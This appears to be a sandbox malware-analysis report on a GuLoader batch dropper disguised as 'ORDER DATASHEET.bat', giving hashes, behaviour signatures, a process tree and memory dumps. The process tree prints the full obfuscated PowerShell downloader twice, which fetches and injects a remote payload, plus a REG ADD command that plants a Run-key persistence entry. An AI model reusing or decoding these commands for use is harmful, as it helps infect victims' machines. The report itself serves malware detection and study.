Overview

overview

10

Static

static

1

ORDER DATASHEET.bat

windows7-x64

10

ORDER DATASHEET.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    11-09-2024 08:27

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ORDER DATASHEET.bat

  • Size

    4KB

  • MD5

    a84cea9cab0242b271056a193f35df67

  • SHA1

    4d72dd4db7fb3d3ea4ca24d434579b8a9b75ef4e

  • SHA256

    4f6fa8a9b72f25d0d25b246cd21c6bb5d73cf8f925d31e6efe61ebd20f18ae14

  • SHA512

    53b19d277c8b13da0924974505fb8718fc6ebc17d00608103019b2f918aaec4715a685fe5339c8310c3cef4659d150184f4ec24906e203cc6baa075b3a13f04a

  • SSDEEP

    96:HSTZjDOr0S8RT8nrTPPAJlcZK97cokj42Ma+7kUWdFCBbiM0FB7QzsXUJp0y+Wfq:e/Rgnnccrjl89eFCGQxxZe

Score
10/10
guloaderdiscoverydownloaderexecutionpersistence

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

    discovery
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\ORDER DATASHEET.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:276
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "$Finanslovens189='Tekstformateringsprogrammet';$Bairnish=${host}.Runspace;If ($Bairnish) {$Biodynamikkens++;$Finanslovens189+='Biofysikkens25';$Autorisationsordnings='su';$Finanslovens189+='Moonshee';$Autorisationsordnings+='bs';$Finanslovens189+='Uforsigtighedens48';$Autorisationsordnings+='tri';$Finanslovens189+='hoselike';$Autorisationsordnings+='ng';};Function Barbitursyren($Flumes){$Exclusivenesses=$Flumes.Length-$Biodynamikkens;For( $Francoiss120=2;$Francoiss120 -lt $Exclusivenesses;$Francoiss120+=3){$Menualternativets+=$Flumes.$Autorisationsordnings.'Invoke'( $Francoiss120, $Biodynamikkens);}$Menualternativets;}function Anagenetic($Absurder106){ & ($largitional) ($Absurder106);}$Poonac=Barbitursyren 'AcM SoOmzMiiPrlKllStaFi/ v5h .B,0P To(TiWwoi,anCrd HoUnwDrsJg .uN.aTKv M1Dr0 M.,n0Er;Hn koWAri,onAf6Fa4Pr;fl .xMe6A,4Wo;Ga MirSuvOn: P1Pa2 M1S.. 0 S),a .aGAneSoc BkNooSh/ a2d 0 C1Ba0 M0In1G,0Fi1B. TrF ai rDae ifA oGax a/ k1 E2 B1Is. .0Ru ';$Tegnkonventioner=Barbitursyren 'ReUIns MeSer e- aADeg.ee n,htBa ';$Trinvise=Barbitursyren ' VhVitRetSppE,sOp:me/Fa/,dt SoMoiP,nS,fBai,ln ,iChtP.yH.a.anJ.dL.bTeeSpy io Vn Pd,etNarEuaRev eStlU..KynTieHetGa/spwDrpB.-B iD n UcMil,auSkdTve,rs,e/,df ,n St CsLi/omUb.nKrhPla CtAui InTig I. Me.pm Uz E ';$Peritoneopericardial101=Barbitursyren 'Sk> M ';$largitional=Barbitursyren ',iiL.eP,xFo ';$Carpetmaker='Smagstter';$Hydrolytic0 = Barbitursyren ' PeWecAlh,coOl Ha% aDrpSapMid QaS,tDua .%Pa\ HTD,eTindudSoeprn ,s .r.lo Gm DaIrn e r SnskeL s H.IcPTioKolHy .v&.i&Un PeKoc,ahAno C jt U ';Anagenetic (Barbitursyren 'Mi$CugA lSpocabPraHelSc:EtEKof,pt eH rC,sExpE,oUnrZae .nSkdoteHysGa= (HvcBam,udUn K/PlcJ. Ce$ UHFlyOpdU r.uo elQuysatSki cHo0Or)Un ');Anagenetic (Barbitursyren 'Go$,igUdl ,oPubCaaNol C: ESAnvSyuHalTem RechdTeeVastr=Ko$SaT erg.iSanhavSoiU sS e n.Mas p TlNai Pt.i( D$ P .eFor AiCit.ao LnJae oSepFre arcoiC,c ,a or BdTuig,aBelBo1C.0ro1Mo)V ');Anagenetic (Barbitursyren ' W[ AN,oeEmtbr.S.S,oeAmr nv PiHoc ,e EP PoC,i.nn .tOpMGaa nAea SgSle irH ]Br:B : dS NeP,c Su,arFiiKltViyDoPLerr oL.tD.o Ec SoFulD. Po=Bo Ri[MlNS,eSmtWi. uSRoeOucFluTyrNai BtHuyPeP Cr So AtMooTrcAsoInl RTLiy RpvieC ]Kv:Sk: T,olCusVa1U,2 r ');$Trinvise=$Svulmedes[0];$Forsstring= (Barbitursyren 'Ar$UtgS lT.oIlb .a SlNe: Rr oe.scDee Fd aeBosja= .N Ee,ow - ROGebEnjEte .cMatLa NeS hySwshitBeeMamSi. sNPre.stLa.c.W UeD b vCStlOrihkeS.n st');$Forsstring+=$Eftersporendes[1];Anagenetic ($Forsstring);Anagenetic (Barbitursyren 'pr$Ugr VeFoc,re fd oe.ts E.ReH,me ,a CdSpeFurSts y[Me$,nTnieScgHenGrkuno,an nv BeA,nP tGriTio NnF,eB rU,]La=Sl$ VPOuoReo.mnHaaCecEr ');$Dumhed=Barbitursyren 'Ba$Spr .e FcAdeK,dVeeBusdt. KD.doafwBen .lScoAnaI.dU F.eibrlInefy(Au$.iTTorBrivenF vC,i ,s .eD., C$a b.baBolModg,e Sn O)N. ';$balden=$Eftersporendes[0];Anagenetic (Barbitursyren 'Ap$Hog El FoSib.taE,l C: E SkP.sH.p gaQ,nKrsS,i Don,n.aiP sYdmN,e,nn .sBe=Sh(L.T Retus tp.-JaP DaVetSkhSa D,$FibBlaTilUhdMeeHjnco)R, ');while (!$Ekspansionismens) {Anagenetic (Barbitursyren '.o$Prg ,lOpoAcbSpa,elSt:GuSBlkEmeTutGrc h re .d,v=m.$F.tSkrU,u Oe D ') ;Anagenetic $Dumhed;Anagenetic (Barbitursyren '.eSIntUnaInrTitI,- RS .l.reude JpRe Sp4an ');Anagenetic (Barbitursyren '.r$ Ag Tl,lo bDiaE.lF,:prEDykC,sKipAnaNon IsIniK o rn UiPrsRemSmeF,nA s K=B.(AnTP eT sVet U- FPPraT,t bhSk St$SobAla DlC,dUne enKu)Pl ') ;Anagenetic (Barbitursyren 'E $ FgEkl ToU b.aa ilap: Sf .oDyr Ze .p Ko UsTrtSt=C,$.ugRelMgo .b,ea ,l,i:RoSHekF i Gn.onIdeHobfrrusulod.edJve.otLa+So+,r%Cr$t SSov,iuHalLimhue ud.eesos a. VcEfoA uHjnbotl ') ;$Trinvise=$Svulmedes[$forepost];}$Ver=291966;$manchuria=26975;Anagenetic (Barbitursyren ' A$.egBylPaoHebTea SlSt:StFhal WjNol,osLahanySmn idMee SrBunSpe,i We=R S G Feopt S-A,CMoo ,n.et Se,rnC tAb Af$BrbTuaAjlErdvlePanAn ');Anagenetic (Barbitursyren 'Ca$H.gInlU.oO.bE a alp.:EhS pa,nsT.s.eiSkeMas Ft u .e=A, S[.uSR yU s,rt Re BmUn.ArC,uo,on MvPaeP rFotKa]S,:Is:paFdirS.oBymLoBTha Ps.oe U6B,4 MS Bt ,r nibun AgCy(Ag$MoF,llBajWilSlsT,hbeyH.nJ ddoeHarO.nUneta) S ');Anagenetic (Barbitursyren 'I.$Deg.ilT oR,bOmaK l S:urBRei,us,nmP,uRet,ct Ae TnUds P M=K, ba[UnSDry ,sFet .eTrmBe.TuT BeKux ,t ,. OES,nPucSko AdGoi An FgAn]C :.e:SuAU S eC UIBeISp. fGSteF.tF.SN.t .rSci Hn Dg t(hy$R.SNoa RsPrsS iTheNss .tUn)N. ');Anagenetic (Barbitursyren 'Em$ ogMalFaoN,bP.a IlKo:FiLAny,ln lg lbSeySae VaKaeGu=Ly$U,B EiFrsT,mFiuL.tM tu eUnn ,sWr. sHeuUnbFosFrt brSti .nRegan( k$StVHaeInred,Sy$.mmSua KnU,c FhSpuFirGli Sa.l) ');Anagenetic $Lyngbyeae;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:780
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tendensromanernes.Pol && echo t"
        3⤵
          PID:1632
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Finanslovens189='Tekstformateringsprogrammet';$Bairnish=${host}.Runspace;If ($Bairnish) {$Biodynamikkens++;$Finanslovens189+='Biofysikkens25';$Autorisationsordnings='su';$Finanslovens189+='Moonshee';$Autorisationsordnings+='bs';$Finanslovens189+='Uforsigtighedens48';$Autorisationsordnings+='tri';$Finanslovens189+='hoselike';$Autorisationsordnings+='ng';};Function Barbitursyren($Flumes){$Exclusivenesses=$Flumes.Length-$Biodynamikkens;For( $Francoiss120=2;$Francoiss120 -lt $Exclusivenesses;$Francoiss120+=3){$Menualternativets+=$Flumes.$Autorisationsordnings.'Invoke'( $Francoiss120, $Biodynamikkens);}$Menualternativets;}function Anagenetic($Absurder106){ & ($largitional) ($Absurder106);}$Poonac=Barbitursyren 'AcM SoOmzMiiPrlKllStaFi/ v5h .B,0P To(TiWwoi,anCrd HoUnwDrsJg .uN.aTKv M1Dr0 M.,n0Er;Hn koWAri,onAf6Fa4Pr;fl .xMe6A,4Wo;Ga MirSuvOn: P1Pa2 M1S.. 0 S),a .aGAneSoc BkNooSh/ a2d 0 C1Ba0 M0In1G,0Fi1B. TrF ai rDae ifA oGax a/ k1 E2 B1Is. .0Ru ';$Tegnkonventioner=Barbitursyren 'ReUIns MeSer e- aADeg.ee n,htBa ';$Trinvise=Barbitursyren ' VhVitRetSppE,sOp:me/Fa/,dt SoMoiP,nS,fBai,ln ,iChtP.yH.a.anJ.dL.bTeeSpy io Vn Pd,etNarEuaRev eStlU..KynTieHetGa/spwDrpB.-B iD n UcMil,auSkdTve,rs,e/,df ,n St CsLi/omUb.nKrhPla CtAui InTig I. Me.pm Uz E ';$Peritoneopericardial101=Barbitursyren 'Sk> M ';$largitional=Barbitursyren ',iiL.eP,xFo ';$Carpetmaker='Smagstter';$Hydrolytic0 = Barbitursyren ' PeWecAlh,coOl Ha% aDrpSapMid QaS,tDua .%Pa\ HTD,eTindudSoeprn ,s .r.lo Gm DaIrn e r SnskeL s H.IcPTioKolHy .v&.i&Un PeKoc,ahAno C jt U ';Anagenetic (Barbitursyren 'Mi$CugA lSpocabPraHelSc:EtEKof,pt eH rC,sExpE,oUnrZae .nSkdoteHysGa= (HvcBam,udUn K/PlcJ. Ce$ UHFlyOpdU r.uo elQuysatSki cHo0Or)Un ');Anagenetic (Barbitursyren 'Go$,igUdl ,oPubCaaNol C: ESAnvSyuHalTem RechdTeeVastr=Ko$SaT erg.iSanhavSoiU sS e n.Mas p TlNai Pt.i( D$ P .eFor AiCit.ao LnJae oSepFre arcoiC,c ,a or BdTuig,aBelBo1C.0ro1Mo)V ');Anagenetic (Barbitursyren ' W[ AN,oeEmtbr.S.S,oeAmr nv PiHoc ,e EP PoC,i.nn .tOpMGaa nAea SgSle irH ]Br:B : dS NeP,c Su,arFiiKltViyDoPLerr oL.tD.o Ec SoFulD. Po=Bo Ri[MlNS,eSmtWi. uSRoeOucFluTyrNai BtHuyPeP Cr So AtMooTrcAsoInl RTLiy RpvieC ]Kv:Sk: T,olCusVa1U,2 r ');$Trinvise=$Svulmedes[0];$Forsstring= (Barbitursyren 'Ar$UtgS lT.oIlb .a SlNe: Rr oe.scDee Fd aeBosja= .N Ee,ow - ROGebEnjEte .cMatLa NeS hySwshitBeeMamSi. sNPre.stLa.c.W UeD b vCStlOrihkeS.n st');$Forsstring+=$Eftersporendes[1];Anagenetic ($Forsstring);Anagenetic (Barbitursyren 'pr$Ugr VeFoc,re fd oe.ts E.ReH,me ,a CdSpeFurSts y[Me$,nTnieScgHenGrkuno,an nv BeA,nP tGriTio NnF,eB rU,]La=Sl$ VPOuoReo.mnHaaCecEr ');$Dumhed=Barbitursyren 'Ba$Spr .e FcAdeK,dVeeBusdt. KD.doafwBen .lScoAnaI.dU F.eibrlInefy(Au$.iTTorBrivenF vC,i ,s .eD., C$a b.baBolModg,e Sn O)N. ';$balden=$Eftersporendes[0];Anagenetic (Barbitursyren 'Ap$Hog El FoSib.taE,l C: E SkP.sH.p gaQ,nKrsS,i Don,n.aiP sYdmN,e,nn .sBe=Sh(L.T Retus tp.-JaP DaVetSkhSa D,$FibBlaTilUhdMeeHjnco)R, ');while (!$Ekspansionismens) {Anagenetic (Barbitursyren '.o$Prg ,lOpoAcbSpa,elSt:GuSBlkEmeTutGrc h re .d,v=m.$F.tSkrU,u Oe D ') ;Anagenetic $Dumhed;Anagenetic (Barbitursyren '.eSIntUnaInrTitI,- RS .l.reude JpRe Sp4an ');Anagenetic (Barbitursyren '.r$ Ag Tl,lo bDiaE.lF,:prEDykC,sKipAnaNon IsIniK o rn UiPrsRemSmeF,nA s K=B.(AnTP eT sVet U- FPPraT,t bhSk St$SobAla DlC,dUne enKu)Pl ') ;Anagenetic (Barbitursyren 'E $ FgEkl ToU b.aa ilap: Sf .oDyr Ze .p Ko UsTrtSt=C,$.ugRelMgo .b,ea ,l,i:RoSHekF i Gn.onIdeHobfrrusulod.edJve.otLa+So+,r%Cr$t SSov,iuHalLimhue ud.eesos a. VcEfoA uHjnbotl ') ;$Trinvise=$Svulmedes[$forepost];}$Ver=291966;$manchuria=26975;Anagenetic (Barbitursyren ' A$.egBylPaoHebTea SlSt:StFhal WjNol,osLahanySmn idMee SrBunSpe,i We=R S G Feopt S-A,CMoo ,n.et Se,rnC tAb Af$BrbTuaAjlErdvlePanAn ');Anagenetic (Barbitursyren 'Ca$H.gInlU.oO.bE a alp.:EhS pa,nsT.s.eiSkeMas Ft u .e=A, S[.uSR yU s,rt Re BmUn.ArC,uo,on MvPaeP rFotKa]S,:Is:paFdirS.oBymLoBTha Ps.oe U6B,4 MS Bt ,r nibun AgCy(Ag$MoF,llBajWilSlsT,hbeyH.nJ ddoeHarO.nUneta) S ');Anagenetic (Barbitursyren 'I.$Deg.ilT oR,bOmaK l S:urBRei,us,nmP,uRet,ct Ae TnUds P M=K, ba[UnSDry ,sFet .eTrmBe.TuT BeKux ,t ,. OES,nPucSko AdGoi An FgAn]C :.e:SuAU S eC UIBeISp. fGSteF.tF.SN.t .rSci Hn Dg t(hy$R.SNoa RsPrsS iTheNss .tUn)N. ');Anagenetic (Barbitursyren 'Em$ ogMalFaoN,bP.a IlKo:FiLAny,ln lg lbSeySae VaKaeGu=Ly$U,B EiFrsT,mFiuL.tM tu eUnn ,sWr. sHeuUnbFosFrt brSti .nRegan( k$StVHaeInred,Sy$.mmSua KnU,c FhSpuFirGli Sa.l) ');Anagenetic $Lyngbyeae;"
          3⤵
          • Network Service Discovery
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2936
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tendensromanernes.Pol && echo t"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2196
          • C:\Program Files (x86)\windows mail\wab.exe
            "C:\Program Files (x86)\windows mail\wab.exe"
            4⤵
            • Suspicious use of NtCreateThreadExHideFromDebugger
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2552
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "aerolithology" /t REG_EXPAND_SZ /d "%Smasket% -w 1 $Nominator163=(Get-ItemProperty -Path 'HKCU:\Mycotoxin\').Svns;%Smasket% ($Nominator163)"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:580
              • C:\Windows\SysWOW64\reg.exe
                REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "aerolithology" /t REG_EXPAND_SZ /d "%Smasket% -w 1 $Nominator163=(Get-ItemProperty -Path 'HKCU:\Mycotoxin\').Svns;%Smasket% ($Nominator163)"
                6⤵
                • Adds Run key to start application
                • System Location Discovery: System Language Discovery
                • Modifies registry key
                PID:2308

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ETUTUWN54ZG7J51HHSOO.temp
      Filesize

      7KB

      MD5

      bb9b0ea3a8fdeeea8c8f0b5080a7b13e

      SHA1

      eed974de5ee1b8699e49107a829f7fa2a66807d0

      SHA256

      d83a7554d263915f3471640652502c403f727e7fb5a164c06125cee5d2ba87e3

      SHA512

      46336814d1d93ec1ce9d46e5b04f4ad5e71219469efe6299a94931131e1c4c3b18fc93dca3720b8c02317ddca6a3bddb5b34025b083eae50830cfe65bffb75da

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Tendensromanernes.Pol
      Filesize

      415KB

      MD5

      d8896856ba5b73ae40ae1c1e93ee183b

      SHA1

      f2d6dd208363caa58433f45dba88ac1814089327

      SHA256

      d175779cdfcf88af27538766d541b7df4f392c0ea6b0ed36c3ea01a9aa01819d

      SHA512

      61375f0f1ec0eaebfaf5348bfbc40cba585f6d7211e5bf002f8fad71c5de69e0b91b65b10583791dad756d54165baf1d201292c80a78aa78ff7f277fde1ce410

      Download Submit

    • memory/780-14-0x000007FEF6440000-0x000007FEF6DDD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/780-6-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/780-8-0x000007FEF6440000-0x000007FEF6DDD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/780-9-0x000007FEF6440000-0x000007FEF6DDD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/780-10-0x000007FEF6440000-0x000007FEF6DDD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/780-11-0x000007FEF6440000-0x000007FEF6DDD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/780-4-0x000007FEF66FE000-0x000007FEF66FF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/780-7-0x000007FEF6440000-0x000007FEF6DDD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/780-5-0x000000001B680000-0x000000001B962000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/780-19-0x000007FEF6440000-0x000007FEF6DDD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/780-18-0x000007FEF66FE000-0x000007FEF66FF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/780-20-0x000007FEF6440000-0x000007FEF6DDD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/780-40-0x000007FEF6440000-0x000007FEF6DDD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2552-37-0x0000000000590000-0x0000000004E0A000-memory.dmp

      Filesize

      72.5MB

      Download

    • memory/2936-21-0x0000000006740000-0x000000000AFBA000-memory.dmp

      Filesize

      72.5MB

      Download